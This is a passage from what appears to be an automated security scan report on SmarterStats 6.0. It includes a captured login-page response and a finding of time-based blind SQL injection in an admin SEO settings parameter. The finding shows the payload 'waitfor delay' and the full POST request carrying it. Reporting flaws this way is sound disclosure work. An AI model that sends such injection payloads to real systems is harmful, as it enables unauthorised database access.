4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAdATG9nRlRQAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAJTG9nRlRQVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0zDzLgCwABAAAA%2f%2f%2f%2f%2fwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAANQExvZ0xvY2F0aW9ucwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAAD0xvZ0xvY2F0aW9uc1RhYgtkBRljdGwwMCRNUEgkUGFnZUlkZW50aWZpZXIxDwUgNGZlNTRjNDQyMWIwNGU1YTk3NWFhNjliOWNjY2M4MTBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkO%2bUDWAPhQZDBIN%2fz%2f3gfFlozCpGuJtURlykZelxfX%2f4%3d&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:00:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8607
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dGVkAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFZGh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPURBJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyZwYWdlPUxvZ2luQWRtaW5kZAIHDw8WCB4ISW1hZ2VVcmwFBi9zLmdpZh4FV2lkdGgbAAAAAAAAAAABAAAAHgZIZWlnaHQbAAAAAAAAAAABAAAAHgRfIVNCAoADZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFFmN0bDAwJE1QSCRjaGtBdXRvTG9naW4FF2N0bDAwJEJQSCRidG5FbnRlckNsaWNrgL28FyeT2FgfCJoS9qDlIS48UTYZAhilwpmMjFTmvVI=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;DA&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dDA\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


2.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter. The application took 16658 milliseconds to respond to the request, compared with 282 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 30128

ctl00%24MPH%24txtDefaultDocuments_SettingText=%0d%0aindex.htm%0d%0aindex.html%0d%0adefault.asp%0d%0adefault.aspx&__LASTFOCUS=&ctl00%24MPH%24lstServer_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MPH%24txtSmarterLogDirectory=C%3a%5cSmarterLogs&ctl00%24MPH%24lstLogFormat_SettingDropDown=IIS&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24grdLogLocationsCheckAll=on&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=1&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=555-555-0199@example.com&ctl00_MPH_grdSeoStatus_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5waitfor%20delay'0%3a0%3a20'--&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00%24MPH%24chkStripAfterSemi_SettingCheck=on&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24txtExportLogDirectory=555-555-0199@example.com&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24lstStatus_SettingDropDown=paused&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=hoytnet&ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-=on&__VIEWSTATE=%2fwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZ